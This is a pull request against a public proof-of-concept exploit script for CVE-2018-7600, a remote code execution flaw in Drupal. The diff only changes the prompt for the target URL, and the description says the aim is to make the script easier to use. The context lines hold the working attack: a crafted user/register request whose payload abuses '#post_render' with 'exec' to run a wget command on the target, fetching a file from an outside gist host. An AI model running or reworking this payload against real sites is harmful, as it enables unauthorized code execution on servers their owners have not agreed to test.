### PR TITLE
Instruct user to use quotes when entering URL.

### DIFF
--- a/exploit.py
+++ b/exploit.py
@@ -10,7 +10,7 @@ print ('# https://github.com/a2u/CVE-2018-7600')
 print ('################################################################')
 print ('Provided only for educational or information purposes\n')
 
-target = input('Enter target url (example: https://domain.ltd/): ')
+target = input('Enter target url in quotes (example: "https://domain.ltd/"): ')
 
 url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
 payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://gist.githubusercontent.com/a2u/66680e1f4abac79d654424ffdb1b410d/raw/d417bbfa8137a1ef53124522a87b1ad1d2b8ec96/hello.txt'}


### PR DESCRIPTION
This is needed because unquoted URLs cause an invalid syntax error. The only purpose of this MR is to make the script easier to use.